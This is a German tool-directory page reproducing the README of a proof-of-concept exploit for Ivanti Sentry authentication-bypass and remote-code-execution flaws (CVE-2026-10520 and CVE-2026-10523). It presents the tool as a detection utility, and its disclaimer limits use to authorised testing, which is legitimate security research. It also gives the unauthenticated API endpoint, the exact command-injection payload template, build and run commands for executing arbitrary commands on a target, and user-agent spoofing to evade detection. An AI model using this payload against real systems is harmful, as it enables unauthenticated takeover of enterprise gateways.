Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-10523-Ivanti-sentry — CVE-2026-10520 - CVE-2026-10523 - Ivanti Sentry | Kitploit
Tools/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlAuthentifizierung
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

CVE-2026-10520 - CVE-2026-10523 - Ivanti Sentry

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
31vor 2 MonatenNoch nicht geprüft

CVE-2026-10523 - Ivanti Sentry RCE Erkennungstool

Ein umfassendes Proof-of-Concept-Erkennungstool zum Testen von Ivanti-Sentry-Schwachstellen im Zusammenhang mit Authentifizierungsumgehung und Remote-Codeausführung. Dieses Tool identifiziert Systeme, die anfällig für CVE-2026-10520 und CVE-2026-10523 sind.

Übersicht

Dieses Projekt dient dazu, zu erkennen und zu bestätigen, ob eine Ivanti-Sentry-Instanz anfällig für kritische Authentifizierungsumgehungs- und Remote-Codeausführungsfehler ist. Das Tool sendet speziell präparierte Nachrichten über den Ivanti-Sentry-API-Endpunkt, um Systembefehle auszuführen und die Ergebnisse zu extrahieren, sodass Sicherheitsforscher und Penetrationstester verwundbare Bereitstellungen identifizieren können.

Schwachstellendetails

CVE-2026-10520

Authentifizierungsumgehungs-Schwachstelle in Ivanti Sentry, die nicht authentifizierten Zugriff auf eingeschränkte API-Endpunkte ermöglicht.

CVE-2026-10523

Remote-Codeausführungs-Schwachstelle in Ivanti Sentry, die die Ausführung beliebiger Systembefehle über die Messaging-API in Kombination mit der Authentifizierungsumgehung erlaubt.

Funktionen

  • Nicht authentifizierte Erkennung von verwundbaren Ivanti-Sentry-Instanzen
  • Fähigkeit zur Ausführung von Systembefehlen zur Proof-of-Concept-Validierung
  • Unterstützung für HTTP- und HTTPS-Verbindungen mit TLS-Überprüfungsumgehung
  • Proxy-Unterstützung für Tests über zwischengeschaltete Systeme
  • Saubere Extraktion der Befehlsausgabe aus XML-Antworten
  • Sichere Fehlerbehandlung mit informativem Feedback
  • Konfigurierbare Timeout- und Antwortgrößenbeschränkungen

Anforderungen

  • Go 1.26.4 oder höher
  • Netzwerkzugriff auf die Ziel-Ivanti-Sentry-Instanz
  • Gültige Ziel-URL mit Protokoll (HTTP oder HTTPS)

Installation

Klonen Sie das Repository und wechseln Sie in das Projektverzeichnis:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Initialisierung und Paketbibliothek abrufen

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Erstellen Sie die ausführbare Datei:

root@kitploit:~
go build -o tot_poc tot_poc.go

Verwendung

Screen Capture

Das Tool erfordert zwei obligatorische Parameter: Ziel-URL und auszuführenden Befehl.

Grundlegende Verwendung

Screen Capture

Führen Sie einen einfachen Befehl auf dem Ziel aus:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Befehlszeilenoptionen

  • -url (erforderlich): Basis-URL des Ziels inklusive Protokoll (z. B. https://127.0.0.1:8443)
  • -cmd (erforderlich): Auszuführender Befehl zur Schwachstellenerkennung (z. B. "uname -a", "id", "whoami")
  • -p oder -proxy (optional): Proxy-Adresse und Port für die Weiterleitung des Datenverkehrs (z. B. 127.0.0.1:8080)

Verwendungsbeispiele

Screen Capture

Schwachstelle mit einfachem Systeminformationsbefehl erkennen:

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Mit Proxy-Konfiguration ausführen:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Befehl zum Extrahieren von Systeminformationen ausführen:

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Ausgabe

Das Tool zeigt an:

  1. Ein Banner mit Schwachstelleninformationen
  2. Ziel-URL, Befehl und Proxy-Konfiguration (falls zutreffend)
  3. Echtzeit-Statusmeldungen, die den Fortschritt der Anfrage anzeigen
  4. Ergebnisse der Befehlsausführung, wenn das Ziel verwundbar ist
  5. Fehlermeldungen, wenn das Ziel nicht verwundbar ist oder die Verbindung fehlschlägt

Erfolgreiche Erkennungsausgabe

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Fehlgeschlagene Erkennungsausgabe

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

Technische Details

Angriffsvektor

Das Tool nutzt den Endpunkt /mics/api/v2/sentry/mics-config/handleMessage, der ohne Authentifizierung zugänglich ist. Der Payload wird wie folgt aufgebaut:

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

Die Antwort enthält die Befehlsausgabe im XML-Format innerhalb eines success-Tags.

Sicherheitsfunktionen

  • TLS-Überprüfungsumgehung zum Testen selbstsignierter Zertifikate
  • Konfigurierbare HTTP-Timeouts, um hängende Anfragen zu vermeiden
  • Begrenzung der Antwortgröße (10 MB), um Speichererschöpfung zu verhindern
  • Angemessene Fehlerbehandlung für fehlerhafte Antworten
  • User-Agent-Spoofing, um einfache Erkennungsmechanismen zu umgehen

Funktionsweise

  1. Analysiere Befehlszeilenargumente für Ziel-URL und Befehl
  2. Erstelle HTTP-Client mit optionaler Proxy-Konfiguration
  3. Erstelle Payload mit dem vom Benutzer bereitgestellten Befehl
  4. Sende POST-Anfrage an den verwundbaren Endpunkt
  5. Extrahiere Befehlsausgabe aus der XML-Antwortstruktur
  6. Zeige Ergebnisse oder Fehlermeldungen entsprechend an

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bereitgestellt. Die Nutzer sind allein dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Anforderungen und Einschränkungen

  • Ziel muss eine verwundbare Ivanti-Sentry-Instanz sein
  • Netzwerkverbindung zum Zielsystem ist erforderlich
  • Standard-Timeout beträgt 10 Sekunden pro Anfrage
  • Maximale Antwortgröße ist auf 10 MB begrenzt
  • Nur wirksam auf Systemen, die verwundbare Versionen von Ivanti Sentry ausführen
  • TLS-Zertifikatsvalidierung ist zu Testzwecken deaktiviert

Autor

GhostGTR666 - Gagaltotal666

Repository

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

Lizenz

Dieses Projekt wird wie besehen für Sicherheitsforschung und Bildungszwecke bereitgestellt.

Referenzen

  • CVE-2026-10520: Ivanti Sentry Authentifizierungsumgehung
  • CVE-2026-10523: Ivanti Sentry Remote-Codeausführung
Tool herunterladen